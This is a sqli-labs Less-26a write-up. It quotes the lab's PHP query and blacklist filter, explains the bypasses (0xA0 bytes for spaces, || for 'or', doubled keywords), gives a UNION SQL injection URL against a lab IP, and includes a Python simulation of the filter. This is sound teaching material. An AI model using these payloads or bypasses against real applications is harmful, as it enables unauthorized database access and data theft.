sqli-labs ———— Less-26a
Less-26a
Let's look at the source code.
Query:
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
Filter:
    function blacklist($id)
    {
        $id= preg_replace('/or/i',"", $id);        // strip out "or" (case insensitive)
        $id= preg_replace('/and/i',"", $id);       // strip out "and" (case insensitive)
        $id= preg_replace('/[\/\*]/',"", $id);     // strip out every "/" and "*" (so /* and */ cannot be formed)
        $id= preg_replace('/[--]/',"", $id);       // strip out every "-" (so -- cannot be formed)
        $id= preg_replace('/[#]/',"", $id);        // strip out "#"
        $id= preg_replace('/[\s]/',"", $id);       // strip out whitespace
        $id= preg_replace('/[\s]/',"", $id);       // duplicate line present in the lab source; strips whitespace again
        $id= preg_replace('/[\/\\\\]/',"", $id);   // strip out forward and back slashes
        return $id;
    }
The differences from Less-26 are that the SQL statement now wraps the value in an extra pair of parentheses, and that when the query throws an error the error is no longer printed on the page. Error-based injection is therefore ruled out, but a UNION query is still usable.
We use ') to close the leading (', append our own SQL after it, and at the end we still have to close the trailing ') ourselves. Everything we inject still has to get past the filter above; the bypass techniques were explained in the previous level and are not repeated here (in short: %a0 instead of a space, since \s without the /u modifier does not match the 0xA0 byte; || instead of or; and doubled keywords such as oorr, because each preg_replace makes a single pass and leaves the "or" that is reassembled). A simple payload:
http://192.168.11.136/sqli-labs/Less-26a?id=1')union%a0select%a01,user(),3||('1
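To see exactly what survives the filter and what the final query looks like, here is a re-implementation of the lab's blacklist() in Python, added as an example for this write-up (it is not code from sqli-labs). It works on bytes so that \s behaves like PCRE without the /u modifier (ASCII whitespace only, not 0xA0), URL-decodes the id parameter the way PHP does for $_GET, splices the result into the Less-26a query, and also runs a few constructed inputs through the filter to show why %20 and a bare "or" fail while %a0, ||, and doubled keywords get through; the extra inputs go beyond the single payload shown on the page.

```python
import re
from urllib.parse import unquote_to_bytes

# The eight preg_replace() calls of blacklist(), in the lab's order.
# Bytes patterns are used deliberately: in Python a str pattern's \s would
# also match U+00A0 and the bypass would wrongly appear to be stripped.
FILTERS = [
    (rb"or", re.IGNORECASE),   # strip "or"
    (rb"and", re.IGNORECASE),  # strip "and"
    (rb"[/*]", 0),             # strip "/" and "*"
    (rb"-", 0),                # strip "-"
    (rb"#", 0),                # strip "#"
    (rb"\s", 0),               # strip ASCII whitespace
    (rb"\s", 0),               # duplicated in the lab source, kept for fidelity
    (rb"[/\\]", 0),            # strip slashes and backslashes
]


def blacklist(value: bytes) -> bytes:
    """Apply the Less-26a filter chain to an already URL-decoded id value."""
    for pattern, flags in FILTERS:
        value = re.sub(pattern, b"", value, flags=flags)
    return value


def build_query(raw_query_value: bytes) -> bytes:
    """URL-decode the id parameter (as PHP does for $_GET), filter it,
    and splice it into the Less-26a statement exactly as the lab does."""
    decoded = unquote_to_bytes(raw_query_value)
    filtered = blacklist(decoded)
    return b"SELECT * FROM users WHERE id=('" + filtered + b"') LIMIT 0,1"


# The payload from this write-up, as it appears in the URL.
PAYLOAD = b"1')union%a0select%a01,user(),3||('1"

# Constructed inputs (not from the page) contrasting blocked and surviving forms.
SAMPLES = {
    b"1')%20or%201=1":        "spaces and 'or' are both removed",
    b"1')%a0oorr%a01=1":      "0xA0 survives \\s, 'oorr' collapses to 'or'",
    b"1')%a0||%a01=1":        "|| is never touched by the filter",
    b"1'/**/--#\\":           "comment and slash characters are all stripped",
}


def filtered_samples() -> dict:
    """Return each sample as seen by the SQL layer after decoding and filtering."""
    return {raw: blacklist(unquote_to_bytes(raw)) for raw in SAMPLES}


if __name__ == "__main__":
    print(build_query(PAYLOAD))
    for raw, note in SAMPLES.items():
        print(f"{raw!r:32} -> {blacklist(unquote_to_bytes(raw))!r:28} # {note}")
```

The query that reaches MySQL is SELECT * FROM users WHERE id=('1')union\xa0select\xa01,user(),3||('1') LIMIT 0,1: the injected ('1 plus the lab's own ') rebuilds a balanced ('1') so the statement parses, and the 0xA0 bytes act as separators. Whether 0xA0 is accepted as whitespace depends on the connection character set of the target; it works in the lab's default setup, so check the charset before relying on it elsewhere.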